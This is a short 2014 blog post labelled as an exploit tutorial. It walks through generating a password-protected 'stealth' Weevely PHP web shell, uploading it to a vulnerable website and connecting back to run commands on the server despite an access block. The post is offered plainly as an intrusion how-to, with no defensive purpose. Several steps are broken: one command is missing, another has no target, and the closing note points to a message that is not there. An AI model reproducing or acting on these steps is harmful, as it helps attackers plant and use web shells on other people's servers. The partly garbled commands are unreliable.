Thursday, 23 October 2014

[EXPLOIT] Backconnect with Weevely

Backconnect with Weevely
Backconnect usually used for a proxy server or firewall closeted. so it can not be done remotely connect. So one trick is to reverse connections, which connect from the server to your computer

Things required
  1. Weevely
  2. Python
  3. Vulnerable file upload site
How to install weevely?
How to backconnect?
1- In my case, i already have a vulnerable site and i am able to upload shell. But, after a few seconds accessing the server through the shell, the connection was stopped and it says "Access Denied"
2- So, to bypass this, i will try to access the server again by backconnect using weevely

3- Firstly, open up Command prompt, type in:
cd \weevely\
 4- Now, to execute the, type in this command:
 5- Alright, now we are going to generate a stealth shell with password. Type in this command generate pass123
C:\python27\python.exe weevely generate pass123
6- You can rename weevely.php to anything as you like, okay, now upload into the site

7- If you access the weevely.php through the web browser, it will show a blank page, but it doesn't meant it failed.

8- To access you weevely shell, type in the cmd: pass123
 C:\python27\python.exe pass123
 9- Now we got access! Once you're logged in, you can do anything
cd - For changing directory

dir or ls - For directory listing

10- Type :help for more commands

NOTE* If you got the message as below, it means that the weevely shell is not accessible